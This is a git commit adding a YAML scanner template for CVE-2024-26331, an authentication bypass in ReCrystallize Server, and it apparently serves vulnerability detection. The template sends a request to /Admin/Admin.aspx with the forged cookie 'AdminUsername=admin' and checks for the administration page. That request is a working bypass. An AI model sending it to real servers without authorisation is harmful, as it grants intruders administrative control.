CVE-2024-26331

2024-04-12 14:10:17 +08:00 · 2024-04-12 14:10:17 +08:00 · d5165791fb
parent 1dd3635124
commit d5165791fb
1 changed files with 25 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-26331_.yaml
+++ b/http/cves/2024/CVE-2024-26331_.yaml
@ -0,0 +1,25 @@
+id: CVE-2024-26331
+info:
+  name: ReCrystallize Server Authentication Bypass via Cookie Manipulation
+  author: Carson Chan
+  severity: high
+  reference: https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
+  description: This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Admin/Admin.aspx"
+    headers:
+      Cookie: "AdminUsername=admin"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "ReCrystallize Server Administration"
+          - "License Status:"
+          - "Fully Licensed."
+        part: body